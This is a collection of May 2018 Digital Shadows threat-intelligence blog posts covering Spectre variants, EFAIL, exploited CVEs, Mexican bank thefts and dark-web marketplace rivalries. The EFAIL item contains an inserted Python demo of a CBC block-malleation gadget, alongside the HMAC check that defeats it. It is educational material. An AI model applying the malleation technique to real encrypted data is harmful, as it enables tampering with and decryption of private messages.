On 21 May 2018 several sources published details on two additional speculative execution side-channel microprocessor vulnerabilities related to the widely reported Spectre and Meltdown PoC attacks. The vulnerabilities affect Intel, Arm and AMD products, and are tracked as CVE-2018-3640 (Variant 3A) and CVE-2018-3639 (Variant 4). Exploitation could give attackers access to sensitive data. CVE-2018-3639 is a new vulnerability subclass titled Speculative Store Bypass. No attacks were observed in the wild targeting either vulnerability, or the original Spectre/Meltdown vulnerabilities. Some limited exploit code was published, but it would likely require significant development for successful exploitation. Given the complexity of targeting these vulnerabilities, threat groups are likely to continue using less complex attack vectors. Mitigation advisories were published by several companies, with more information expected over the coming weeks.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Security Analyst Spotlight Series: Rose Bernard Wed, 23 May 2018 15:09:59 +0000 Organizations rely on our cyber intelligence analysts to be an extension of their security team. Our global team of analysts provide relevant threat research, much needed context, tailored remediation advice and managed takedown support to make our clients’ jobs easier and more efficient. Crucially, by having analysts within the intelligence and collection cycle, we’re able to minimize the real-time false positives that cause nightmares for most organizations.

In our Security Analyst Spotlight Series, we bring our analysts out of the shadows and into the spotlight, showcasing their expertise and interests so you can learn a bit more about a “day-in-the-life” of a Digital Shadows Intelligence analyst.

Name: Rose Bernard
Team: Strategic Intelligence
Title: Strategic Intelligence Manager

Q: How did you get into cybersecurity?

A: Before working in cybersecurity I was working in an investigational role, primarily focusing on international counter-narcotics. At the time, the nexus between cyber investigations and cybersecurity strategy was still developing, and so getting involved in it meant that as a relatively junior member of staff I was able to cover a lot of really interesting and complex operational and geopolitical cases I wouldn’t have had the opportunity to otherwise. I was given a lot of freedom and independence to conduct research and create actionable plans, which I really enjoyed.

From there, it was a natural step to take the skills that I’d learnt in an operational context and apply them to cybersecurity research, primarily looking at the deep and dark web. Cybersecurity for me has always been this really interesting space that merges the more traditional geopolitical concepts of power and politics, with this really chaotic space where other threat actors can completely upturn the balance of power.


Q: How have your past experiences prepared you for your role? 

A: Career-wise I’m lucky enough to have worked in a whole spectrum of different roles, so I’ve been able to get a really good understanding of the wider context surrounding cyber incidents. I’ve worked with a wide variety of different people in different countries, so I’ve really been able to soak up a lot of knowledge about things that I wouldn’t necessarily have if I’d stayed on one track. Independent research has always been a big part of my academic career, which has really helped me develop analysis skills. I speak a wide range of languages, including Spanish, French, Italian, German and Portuguese, which is incredibly helpful given the international nature of cybercrime.


Q: What do you do outside work that helps with your job?

A: I’m currently studying for my PhD, where I’m creating a framework for civilian and military organizations to share intelligence and information in pandemics and Public Health Events of International Concern (PHEICs). The practice of independent research is really strengthening my skills, as is the focus on original and critical thought. I’m also learning a lot about the functions of intelligence frameworks, which is helping me provide context to my work at Digital Shadows.


Q: What advice would you give someone wanting to become an intelligence analyst?

A: Get curious. You don’t need to have an academic background in a really niche area to be an analyst (you don’t really need an academic background at all). A lot of the technical skills can be learnt on the job. What you do need is excellent research skills, and to want to join the dots to make sense out of something that might seem unconnected.

Also, get used to hard work, and be prepared to speak up. At times intelligence analysis can be a real slog of just gathering as much information as you can before you start the actual analysis process. And when all that’s done, don’t be afraid to draw conclusions and to have opinions. You’ll have to back them up, but original thinking is one of the most important qualities in intelligence analysis.

Finally, listen. This sector is a real mishmash of people with different skills and experiences, and everyone has a slightly different way of looking at a problem, which can draw out some really interesting and beneficial elements.



Rose Bernard has worked as an intelligence analyst for Digital Shadows since January 2018. Prior to this she worked for Control Risks as a cyber threat analyst, and for the National Crime Agency, where she focused on counter-narcotics in Afghanistan and Pakistan. Rose holds an MA in History and Languages from University College London and is currently gaining her doctorate at King’s College London, where she is creating a framework for intelligence sharing between civilian and military organizations in the case of public health events of international concern (PHEIC). Her particular interests include the evolution of Latin American cybercrime and mapping the dark web. See her blog posts here.

Learn more about our Intelligence Analysts in our Security Analyst Spotlight Series.


Interested in hearing more from our intelligence team? Check out our blog or subscribe to our weekly threat intelligence podcast: ShadowTalk.

A New Approach for Channel Security Consultants Tue, 22 May 2018 15:39:54 +0000 Old school security practices simply don’t fit the new IT environment.  Cloud computing, applications and distributed workforces have changed the security game. The days of building perimeter walls still exist, but the walls are disappearing.  This leaves channel security consultants wondering what the right allocation is for security budgets. As indicated in a 2016 SANS report on security spending trends, the goals of an organization often do not match their actual security spend. Compliance and data protection are some of the key drivers in today’s ideal security spend – but is this really where funds are being concentrated? Of course, we all need standard measures such as authentication, firewalls, end-point and malware protection. The question is, how can channel security consultants recommend a solution that doesn’t take away from what’s needed as a baseline and still addresses the true goals of an organization? 

Modern Day Threats    

Security has become more complex with today’s threats and risks. Big breaches have hit the headlines year after year.  What’s the main cause of these breaches?  According to the 2017 Verizon Data Breach report, 81% of hacking-related breaches leveraged stolen or weak passwords. In the more recent 2018 Verizon report, the use of stolen credentials was the leader in the “top 20 action varieties in breaches” (ahead of memory scraping, phishing and privilege abuse). Today’s threat actors are well connected and communicate effectively across messaging platforms, social media, and the deep and dark web to share compromised information such as passwords. So, what strategies and tactics can a channel security consultant deploy to address these security threats? 

A Preventative Approach to Security

Breaches are never expected, which is why organizations should move to a more proactive approach. One-off assessments fail to provide a continuous method to search and hunt for threats and vulnerabilities. I’m not referring to the SOC hunting done once an attacker is present. That’s an escalated procedure that needs to be addressed and repaired immediately. Instead, I mean identifying and capturing the compromised information, data, credentials or vulnerabilities that would be used before an attacker has entered your environment. Here are some examples:

  • Someone squatting or impersonating a domain to harvest credentials
  • Compromised data or credentials shared and sold on criminal forums
  • Employees inadvertently oversharing on social media
  • Third parties compromising data due to weak policies

Wouldn’t it be great if channel consultants could find nuggets of threat-led information for their clients before they were attacked? A preventative approach to security can help. If you know the threat before the attack occurs, it’s easier to combat it and set up your defenses. This approach allows the team to become more effective in dealing with modern day risks.

A continuous monitoring and management approach across the open, deep and dark web fits the bill for understanding and applying a preventative approach to these risks. Sifting through mounds of alerts, false positives and “gotchas” can be cumbersome for any organization or Managed Security Service Provider (MSSP). More so, a common security challenge we all face is talent. Security talent is hard to find and keep. To best ensure a preventative approach, an analyst needs to be there to contextualise and evaluate the relevance and impact of threats to your particular organization’s circumstances. This can be a member of your security operations team or a vendor’s. Having a client chase their tail on real-time false alerts can cost more money than it’s worth.

Rebalance Security Spending

Most financial advisors will recommend rebalancing your 401K when the market shifts: when stocks go up, your allocation to them is most likely higher than you intended, simply because the market moved. In the case of security, consultants should consider rebalancing their client’s allocation of security spend to address modern-day threats and risks. A consultant’s approach to security budgets should address the methods of harvesting and capturing exposed data or compromised credentials before they are used in an attack. A little more allocation to the preventive bucket can greatly reduce the amount the organization would spend if it is compromised and breached.


About Digital Shadows’ Channel REV Partner Program

Digital Shadows enables organizations to manage digital risk by identifying and eliminating threats to their business and brand. Channel partners leverage Digital Shadows to monitor for digital risk across the widest range of data sources within the open, deep and dark web to deliver tailored threat intelligence, context and actionable remediation options that enable security teams to be more effective and efficient. Our partners help their clients protect their data when exposed, if employees or third parties put them at risk, or if their brand is being misused. To learn more, visit

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Shadow Talk Update – 05.21.2018 Mon, 21 May 2018 13:26:50 +0000 In this week’s episode of Shadow Talk, Digital Shadows’ Head of Security Engineering, Dr Richard Gold, joins the pod to explain the EFAIL vulnerability affecting OpenPGP (Pretty Good Privacy) and S/MIME (Secure/Multipurpose Internet Mail Extensions), as well as other flaws identified in encrypted messaging platforms. Dr Gold also outlines the factors you should be considering to prioritize your patching.

In part two, we look at the 15 million dollar thefts in Mexico and outline the risks facing interbank payment systems.

Millions stolen from Mexican banks using interbank system

More than $15 million was reportedly stolen from Mexico-based banks by unidentified attackers who submitted fraudulent transfer orders via the SPEI, an electronic payment system developed and operated by Banco de México. The April 2018 theft subsequently forced Mexican banks to adopt contingency plans for interbank payments. Flaws in third-party software were likely used to access the SPEI, drawing comparisons to previous thefts that exploited the SWIFT interbank platform. More details are likely to be released in the short-term future (within three months).


SilverTerrier phishing attacks secure USD 3 billion profit to date

A collective of predominantly Nigeria-based threat actors, known collectively as SilverTerrier, has delivered phishing attacks using information-stealing malware and remote-access trojans against targets in multiple sectors and regions. The threat actors demonstrated a range of technical skills, but also some poor operational security practices, including using the same credentials to register malicious domains and personal social media profiles. According to law-enforcement estimates, the attacks equate to more than $3 billion in losses from the targeted companies to date.


Proof of concept attacks decrypt PGP and S/MIME encrypted emails

On 14 May 2018, three universities collaborated to outline two proof-of-concept attacks allowing emails sent using OpenPGP and S/MIME to be displayed in plaintext under certain conditions. PGP is an encryption program that provides cryptographic privacy and authentication, and S/MIME is a standard for public-key encryption of email. The “EFAIL” attacks required existing access to the encrypted emails. In the first attack, a threat actor could hypothetically abuse the way certain email clients render Hypertext Markup Language (HTML) in PGP or S/MIME emails so that the client decrypts the message and exfiltrates the plaintext to an attacker-controlled web address. The second attack relied on the attacker already knowing one block of plaintext, and largely affected S/MIME through a Cipher Block Chaining (CBC) gadget: because CBC ciphertext can be modified without the key, a known plaintext block can be turned into a block of the attacker’s choosing. This could be used to decrypt multiple emails. Given the potential for access to encrypted data, if deployed, this attack vector would likely be used by threat actors with highly specific intelligence-gathering aims and substantial intent and resources.
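The CBC gadget mentioned above, as an added educational example (not code from this post or from the EFAIL researchers): CBC malleability is a property of the mode rather than the cipher, so a toy 16-byte Feistel cipher built on SHA-256 stands in for AES, and an encrypt-then-MAC wrapper shows the integrity check that makes the gadget fail. All keys, IVs and messages are constructed sample values.

```python
"""Added educational example: why a CBC "gadget" works without the key, and
why an integrity check (here an HMAC) stops it.  The Feistel cipher below is a
stand-in for AES; the malleability demonstrated is identical for any block
cipher run in CBC mode without authentication.  Not the post's own code."""
import hashlib
import hmac
import os

BLOCK = 16   # block size in bytes
ROUNDS = 8   # Feistel rounds in the toy cipher


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round_fn(key: bytes, i: int, half: bytes) -> bytes:
    # Keyed round function returning one half-block (8 bytes).
    return hashlib.sha256(key + bytes([i]) + half).digest()[: BLOCK // 2]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in range(ROUNDS):
        left, right = right, _xor(left, _round_fn(key, i, right))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        left, right = _xor(right, _round_fn(key, i, left)), left
    return left + right


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    if len(plaintext) % BLOCK:
        raise ValueError("plaintext must be a whole number of blocks")
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        cur = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, cur), prev))   # P_i = D(C_i) XOR C_{i-1}
        prev = cur
    return b"".join(out)


def malleate_block(iv: bytes, ciphertext: bytes, index: int,
                   known: bytes, chosen: bytes) -> tuple:
    """The CBC gadget: without the key, change plaintext block `index` from
    `known` to `chosen` by XORing the difference into the preceding ciphertext
    block (or into the IV for index 0).  The preceding block then decrypts to
    garbage; the gadget accepts that as the price of the chosen block.  In
    EFAIL the known block is predictable MIME header text."""
    delta = _xor(known, chosen)
    blocks = [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    if index == 0:
        return _xor(iv, delta), ciphertext
    blocks[index - 1] = _xor(blocks[index - 1], delta)
    return iv, b"".join(blocks)


def _mac_key(key: bytes) -> bytes:
    return hashlib.sha256(b"mac" + key).digest()   # simple key separation


def seal(key: bytes, plaintext: bytes) -> bytes:
    """Encrypt-then-MAC: the tag covers IV and ciphertext, so any modification
    is detected before the client ever decrypts, let alone renders, the body."""
    iv = os.urandom(BLOCK)
    ct = cbc_encrypt(key, iv, plaintext)
    return iv + ct + hmac.new(_mac_key(key), iv + ct, hashlib.sha256).digest()


def open_sealed(key: bytes, blob: bytes) -> bytes:
    iv, ct, tag = blob[:BLOCK], blob[BLOCK:-32], blob[-32:]
    expected = hmac.new(_mac_key(key), iv + ct, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("integrity check failed: ciphertext was modified")
    return cbc_decrypt(key, iv, ct)


if __name__ == "__main__":
    key = hashlib.sha256(b"constructed demo key").digest()   # constructed
    iv = bytes(range(BLOCK))                                  # constructed
    msg = b"Content-Type: te" + b"xt/html; charset" + b"=utf-8 SECRET..."
    ct = cbc_encrypt(key, iv, msg)
    iv2, ct2 = malleate_block(iv, ct, 1, msg[16:32], b"CHOSEN-BLOCK-16!")
    print("unauthenticated CBC:", cbc_decrypt(key, iv2, ct2))
    blob = bytearray(seal(key, msg))
    blob[BLOCK] ^= 0x01                                       # one flipped bit
    try:
        open_sealed(key, bytes(blob))
    except ValueError as err:
        print("authenticated CBC:", err)
```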


Cryptocurrency miner targets Oracle WebLogic vulnerability

Threat actors using the CoinMiner cryptocurrency malware are actively targeting a remote code execution flaw affecting the Oracle WebLogic application server. There has been a recent uptick in attacks targeting the vulnerability, designated CVE-2017-10271. The infection process was similar to that of another recent attack in February 2018, which distributed mining malware by exploiting a flaw in the Apache CouchDB database; it is possible the same threat actor was responsible for both campaigns, though this is unconfirmed. Patches are available to address the vulnerability, but more attempts at exploitation are highly likely.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Patch Priorities: 10 Vulnerabilities You Should Pay Attention To Thu, 17 May 2018 14:30:06 +0000 Not all vulnerabilities are created equal, and those that have been exploited by threat actors carry more weight. Last month, Digital Shadows reported on ten software vulnerabilities that were publicly exploited by threat actors. The motives for these attacks included information theft, espionage, financial profit, and disruption. The three key takeaways were:


  1. Drupal vulnerabilities among the highest severity vulnerabilities. CVE-2018-7600 is a remote code execution (RCE) vulnerability affecting versions of the Drupal content management system (CMS). According to public reports, this was the most targeted vulnerability in April 2018 by actors conducting cryptocurrency mining activity, but the flaw was also exploited to create a botnet to conduct distributed denial of service (DDoS) attacks. Similarly, another vulnerability identified by Drupal was CVE-2018-7602. Security patches have been released, but a threat actor has already reportedly exploited the vulnerability to deface a Ukrainian government website. Both Drupal vulnerabilities are highly likely to continue to be exploited in the near future.
  2. Eternal blues. Attackers continue to exploit the vulnerabilities CVE-2017-0145 and CVE-2017-0143, also known as ETERNALROMANCE and ETERNALBLUE. These exploits were publicly released by the Shadow Brokers threat group in April 2017 and have been used in a variety of campaigns to date. Both attacks exploiting these flaws in April 2018 were financially motivated: a cryptocurrency mining campaign and a ransomware campaign.
  3. CVE-2017-11882 has longevity. The Microsoft Office memory corruption vulnerability that allows remote code execution has been targeted continuously since November 2017, when proof-of-concept code was publicly leaked, despite the release of security patches addressing the flaw. More attempts to exploit this vulnerability are highly likely in the short-term future (next three months).


The table below provides an overview of the vulnerabilities, including an indication of how widely they were discussed across social media and other sources of potential insight into their popularity. Specifically, it shows:

  • A CVE reference number and hyperlink to the United States National Vulnerability Database (NVD)
  • A description of the vulnerability type and affected system versions
  • The motivations observed in the attacks that exploited it
  • The number of incidents Digital Shadows reported on this vulnerability during April 2018
  • The severity of the vulnerability as assigned by the NVD
  • A current status on whether a patch is available, and a hyperlink to additional relevant details
CVE Number | Description | Observed Motivations | Number of DS incidents | CVE score | Patch status
---------- | ----------- | -------------------- | ---------------------- | --------- | ------------
CVE-2018-7600 | RCE vulnerability affecting Drupal CMS versions pre-7.58, 8.x before 8.39, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. | Financial and Disruption | 3 | Critical | Patch available
CVE-2017-8570 | RCE vulnerability in Microsoft Office. | Information Theft | 2 | High | Patch available
CVE-2018-7602 | RCE vulnerability affecting Drupal Core 7.x and 8.x. | Financial and Disruption | 1 | TBD, awaiting analysis | Patch available
CVE-2016-3353 | RCE vulnerability affecting Microsoft Internet Explorer 9 through 11. | Financial | 1 | High | Patch available
CVE-2018-0802 | RCE vulnerability affecting Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016. | Information Theft | 1 | High | Patch available
CVE-2018-0171 | RCE vulnerability in the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software. | Disruption | 1 | Critical | Patch available
CVE-2015-3636 | Local privilege escalation in the Linux kernel pre-version 4.0.3. | Information Theft | 1 | Medium | Patch available
CVE-2017-11882 | Vulnerability in Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 permitting an attacker to run arbitrary code. | Financial | 1 | High | Patch available
CVE-2017-0145 | RCE vulnerability in the Server Message Block (SMB) v1 server in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016. | Financial | 1 | High | Patch available
CVE-2017-0143 | RCE vulnerability targeting the SMB v1 server in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016. | Financial | 1 | High | Patch available

Table 1: Summary of vulnerabilities reported as exploited in April 2018


It’s a constant challenge to understand which patches you ought to prioritize applying, but this blog provides information that can help to feed into your decision. If you are running the applications, systems and services listed, these are the 10 vulnerabilities you should be paying attention to. The next post in this series will provide a similar analysis of vulnerabilities for May 2018.


To stay up-to-date with the latest vulnerabilities and threat intelligence, subscribe to our newsletter.

Digital Shadows 7th Anniversary – A Look Back Wed, 16 May 2018 14:26:27 +0000 Today marks the 7th anniversary of Digital Shadows. As James and I looked back on the year, we were amazed at all that the team has accomplished within the last 12 months. We’d like to highlight a few of our accomplishments for the year and recognize our customers and our incredible team, who have helped to make this year so successful.

Digital Shadows Raises $26M To Expand and Fuel Global Expansion

On September 20, 2017, we announced $26m in a Series C funding round to expand the capabilities of SearchLight and fuel global expansion. Led by Octopus Ventures, with participation from World Innovation Lab, Industry Ventures and all of Digital Shadows’ existing investors, the funding supports company growth and our continued commitment to protecting organizations with the best and most comprehensive digital risk management solution in the industry.

SearchLight: Shadow Search Announced, 15 New Engineers

From a product standpoint, we continued to enhance our SearchLight service to give customers even more value. Two specific highlights included hiring 15 new engineers to the team and announcing Shadow Search, a feature within Digital Shadows SearchLight™ that speeds up the security operations process, quickly enabling deeper research and faster investigation. The result is better decision making that gives valuable time back to security operations teams. Organizations have direct access to the vast repository of technical, tactical and strategic threat intelligence, and raw web content, curated and collected by Digital Shadows, to investigate threats and take immediate action.


Digital Shadows Opens New State of the Art Offices in London and Dallas and Expands into Germany and Singapore

We now have nearly 200 employees across offices in London, San Francisco, Dallas, Singapore, and Frankfurt. With our $26M Series C funding last year, we committed to expand our business into Asia and Europe to support customers on a global basis. Below is a photo from our ribbon cutting ceremony in London.



Women’s Network and Other Diversity Initiatives

With the accelerated growth we’ve seen this year, we’ve also launched a few initiatives to prioritize diversity at Digital Shadows, including our new Women’s Network, which we announced just last week. We want talent that is diverse across the board, with different backgrounds, experiences, and opinions, to help propel the business forward with more informed decisions. We are proud that women make up over 30% of Digital Shadows and play an incredibly important role in all parts of our business.

Top Research Findings by our Intelligence Team

Our expert Intelligence Team conducted a great deal of interesting threat intelligence research this year. Just a few of the headlines and topics included:

  • Misconfigured FTP, SMB, Rsync, and S3 Buckets Exposing 1.5 Billion Files
  • The New Gold Rush: Cryptocurrencies are the New Frontier of Fraud
  • The Business of Disinformation: A Taxonomy | Fake News is more than a political battlecry
  • Inside Online Carding Courses Designed for Cybercriminals: Credit Card Fraud Gangs Cashing in on $24 billion a year
  • Equifax Breach Lessons Learned

Find all of their great threat intelligence research on our resources center.

Launch of Digital Risk Management Technology Ecosystem, Channel Rev Partner Program + New Partner Portal

Formed from 15+ technology companies, with more about to join the program, the Digital Risk Management Technology Ecosystem partners all share a vision for how security analytics and security information and event management (SIEM), product orchestration and automation, risk and compliance, intelligence, and network enforcement must work together to best protect customers from today’s digital risks. We also launched our channel-only partner program, Channel REV, and an associated online Partner Portal, designed to accelerate partner revenue and enhance their customers’ loyalty.

We’ve accomplished quite a lot this year, but we’ve also made sure to have plenty of fun. Take a look below at some of our social events, conference parties, charity functions, and more. Thanks for another great year, everyone!

Shadow Talk Update – 05.14.2018 Mon, 14 May 2018 15:17:24 +0000 In this week’s episode of Shadow Talk we look at the Winnti Umbrella group, asking what this means for organizations. We discuss vulnerabilities in Microsoft Office (CVE-2018-8174) and baseStriker. And, finally, we outline the fallout surrounding the Olympus dark web marketplace.


Chinese state-associated threat actors linked under one umbrella

Individual threat groups and actors conducting politically motivated operations have been identified as working within one Chinese state-associated collective, known as the Winnti umbrella group. Identification of this group was made possible by operational security mistakes made by some of the actors and groups, which revealed overlapping command-and-control (C2) infrastructure used in operations previously seen as unrelated. One favored tactic among the attackers was the theft of code-signing certificates from software companies, which were then used in later attacks to make malicious components appear legitimately signed. The collective demonstrated varying technical capabilities but was persistent in its approach, and should be considered a highly credible threat.


Patch delay leaves Intel CPUs vulnerable to exploitation

Technology company Intel has delayed the release of security patches designed to address newly identified flaws affecting its CPUs. The delay means the vulnerabilities may be publicly disclosed before patches are made available. These “Spectre-NG” vulnerabilities are related to the previous “Spectre” and “Meltdown” vulnerabilities, and could be exploited by attackers to secure control of a compromised system. The initial patches were due to be released on 21 May 2018, with additional patches to be released in August 2018.


Cryptocurrency miners target multiple exploits

A new cryptocurrency mining campaign is using three exploits to distribute a variant of mining malware. The vulnerabilities affect Oracle WebLogic Server, Apache Struts 2 and the Server Message Block (SMB) v1 server in the Microsoft Windows operating system. The third flaw is targeted by the exploit known as “ETERNALBLUE”, previously assessed to have been developed by the United States National Security Agency and publicly released by the “Shadow Brokers” threat group in April 2017. Patches are available for all three vulnerabilities.


Zero-day exploitation of CVE-2018-8174 attributed to DarkHotel group

Security company Qihoo360 reported that the espionage group DarkHotel (aka APT-C-06) has exploited a zero-day vulnerability to target China-based foreign trade entities. Microsoft released the patch for the flaw on 08 May 2018. This is the first observed use of the URL Moniker programming architecture to load an Internet Explorer exploit: the flaw enables an attacker to render a webpage using the Internet Explorer engine, even if Internet Explorer is not set as the default browser on the device.


Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

Offsetting Dunbar by Developing Diversity Tue, 08 May 2018 15:36:30 +0000 Some of you may be familiar with the Dunbar Number, 150, being the maximum number of relationships one individual can maintain successfully. Having recently surpassed this number ourselves, this is the perfect opportunity to think more about how we foster culture, diversity, and learning.

As we enter into our seventh year as a company, we will be launching a few initiatives to refocus and prioritize diversity and learning at Digital Shadows. Namely, I am excited to announce that we will be launching a Women’s Network.

During our London Office Launch on April 26th, our CEO, Alastair Paterson told the story of his relative being one of the Codebreakers at Bletchley Park during World War II. At that time, over 70% of the individuals involved were women. Now, women make up just over 10% of individuals working within the Cyber Security Industry. That is not progress.

We want to change that. Currently, Digital Shadows is made up of 32% women, but this isn’t enough. A diverse workforce and a safe environment are demonstrably the right thing to do, but there are also tangible business benefits to having talent that doesn’t all think the same. In order for us to provide best-in-show intelligence, we need a range of backgrounds and experiences to make more informed decisions and to rely less on groupthink. This doesn’t stop at gender, but continues with culture, age, and language as well.

The more we can nurture the exceptional differences we have, the more comfortable we will be to innovate, to challenge the way in which we understand both the cyber world and how we provide service to our clients, and also how we foster the development of the incredible individuals that make Digital Shadows so unique. One of our four values after all is, “All about People”.


To learn more about the company, visit our About Us page.

Shadow Talk Update – 05.07.2018 Mon, 07 May 2018 15:00:26 +0000 In this week’s episode of Shadow Talk, it’s a vulnerability extravaganza. We cover malicious use of legitimate software, as APT28 is attributed with hijacking LoJack and Blackrouter is delivered via AnyDesk software. We also look at vulnerabilities found (and exploited) in GPON home routers, and at Loki Bot exploiting two remote code execution vulnerabilities in Microsoft Office (CVE-2017-8570 and CVE-2018-0802).

Microsoft Office flaws exploited to deliver Loki Bot

Distributors of the Loki Bot information-stealing malware are exploiting two remote code execution (RCE) vulnerabilities in Microsoft Office: CVE-2017-8570 and CVE-2018-0802. CVE-2018-0802 is associated with another flaw (CVE-2017-11882), and only devices that have applied the patches for that vulnerability can be exploited in the new attacks. Because Loki Bot is widely available on online criminal forums, there has been no attribution for the recent activity. Proof of concept (PoC) code has been released online, which has highly likely enabled attackers to target both vulnerabilities.

Cyber incident affects Mexican inter-bank money transfers

News service Bloomberg reported that three Mexican banks were forced to use contingency plans for monetary transfers after a cyber “incident” affected connections with the Interbank Electronic Payment System (SPEI). The SPEI is a nearly real-time hybrid settlement system that enables transfers between participating banks, and is operated by Mexico’s central bank (Banco de México). At the time of writing, few details of any intrusions are publicly available. Attacks targeting specific banks and their internal systems are often conducted by threat actors with a good knowledge of banking payment infrastructure. This incident followed a failed attack on a Mexican bank’s SWIFT platform in January 2018.

GravityRAT evades detection for two years

A previously unreported RAT, dubbed GravityRAT, allegedly targeted organizations in India and has been under development for the past two years. GravityRAT has similar functionality to pre-existing RATs, including file extraction and RCE. GravityRAT evaded detection for multiple years despite its C2 infrastructure remaining static throughout its evolution. This likely indicates that there were only a few attacks against organizations, and that it was unlikely to have represented a significant threat.

Rubella Macro Builder crimeware kit used in banking malware campaigns

Malware distributors have been using a new crimeware kit, called Rubella Macro Builder, for attacks. The kit is available to rent from Russian-language criminal forums at a relatively low price, and offers a range of functions pertaining to payload execution and encryption. The attack vector relies on social engineering, sending emails with malicious Microsoft Office documents attached: an unsophisticated but consistently popular distribution method. Since its emergence in February 2018, the kit has undergone modifications and developments, and more improvements are highly likely in the short term.

Subscribe to our weekly newsletter to get the latest podcast and other research by Digital Shadows.

The Other Side of the Counter: DDoS, Social Engineering, Spambots and Insider Risks to Criminal Locations Wed, 02 May 2018 14:53:08 +0000 An enduring characteristic of dark web marketplaces is how frequently they’re offline, often through denial of service (DoS) attacks. While marketplace administrators can stand to make big bucks, they’ve got their own threat models to be worried about:

  • law enforcement,
  • disgruntled consumers,
  • and competitors

Each of these has a vested interest in seeing the site inaccessible. Tor sites are anonymous but not necessarily robust; many are vulnerable to DDoS attacks and, more destructively, site hijackings. We have observed that cybercriminals spend as much time attacking other cybercriminals as they do innocent victims. However, we have also observed that the dark web is not a digital ‘wild west’ where anything goes. Far from it. If you publicly take another Tor site offline, you had better have had a good reason to do so.

This infighting can have a negative impact on the trust their customers place in them. Trust is a precious commodity, and there’s a delicate balance between self-preservation and self-destruction. In a move to consolidate their market position within the dark web criminal ecosystem, the promising new kids on the block, Olympus, may have achieved the opposite.


Competing interests and interesting competitions

Be it by rivals or law enforcement, the targeting of marketplaces is common. We’ve observed this for many years and it’s definitely not a new phenomenon. Social engineering is particularly common: spoofing a marketplace’s logon page to harvest the credentials of its users so that a competitor marketplace can expand its own user base. One suspicious onion domain (alphabay2qlxrxff[.]onion) is currently active that appears to be doing just that (Figure 1). Such is the ubiquity of this technique that it’s common to see the list of official mirrors posted on the login pages of marketplaces to inform unsuspecting visitors of the likely risks.


Figure 1: A suspected spoof site targeting the Dream marketplace


But social engineering is just one technique we’ve seen targeting marketplaces. In 2017, we came across the listing shown in Figure 2, a posting on Hansa of an “Alphabay Forum Bot”, a script to spam AlphaBay users and benefit from their significant audience. (You know it was 2017 when the asking price of 0.1179 BTC was worth less than a third of what it is now.)


Fig 2: A former listing from Hansa, selling a bot to spam AlphaBay users, from 2017


The overall dark web marketplace community hasn’t quite attracted the same amount of traffic (on both the vendor and buyer side) since the takedowns of AlphaBay and Hansa in July 2017. At its zenith, AlphaBay was the 900-pound gorilla and boasted hundreds of thousands of users. Just as AlphaBay had done following Evolution market’s 2015 exit scam, its competitors sought to become the dominant market. Many marketplaces have fallen short of filling this vacuum, including Dream market, Wall Street Market and Tochka. Nonetheless, the race is clearly still on to dominate the market, and one of the most promising candidates is Olympus.



Insider threats apply to dark web markets too

After slowly developing a good reputation, the admin of Olympus last week claimed that they were in the process of hacking Dread (Figure 3). Dread is – or at least was – a reddit-style community run by a user infamous for pointing out security flaws in other dark web marketplaces.


Fig 3: The initial claim from Olympus. Screenshot from Deepdotweb


Public apologies and public relations

However, it soon transpired that this was not a “hack” in the traditional meaning. Instead, the admin of Olympus allegedly acquired access to the Dread servers from an insider. You can read a more thorough account of the saga in Deep Dot Web. What was significant about this incident was that the user community of Dread rallied behind the designer of the Dread forum, with consensus finally settling that Olympus was in the wrong and Dread was the innocent victim. In the end the moderators of Olympus issued an apology to the Dread admins for their actions (Figure 4). Tellingly, Olympus seems to be aware of the damage it has caused to its own reputation, stating that it will hire a “good PR within the next few days”. Just as with legitimate businesses, a positive public image is important to drive revenue.


Fig 4: An apology from an Olympus moderator, from 25 April 2018


Customer trust is as important for criminal business as it is for legitimate business

When the two tactics of audience attraction (spam and rival forum sabotage) are viewed together, an interesting picture of the current state of the cybercriminal dark web emerges.

Trust is hard to build up, but incredibly easy to lose. Just as we’ve seen with bungled breach responses, the immediate aftermath of a negative event is an important time period. Of course, it’s important not to overinflate this. As we discussed in a previous blog, The Future of Marketplaces, trust is just one factor that determines the success of new marketplaces. User experience, secure communications and content control are all drivers that shape who comes out on top.

There are other lessons that can be applied. This saga also serves as a timely reminder for organizations to consider their threat model. The nature of their customers and the data they hold make marketplaces a target for law enforcement and competitors. Organizations should also consider what data they hold, how their online activities can leave them exposed, and assess which adversaries stand to benefit from targeting this.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

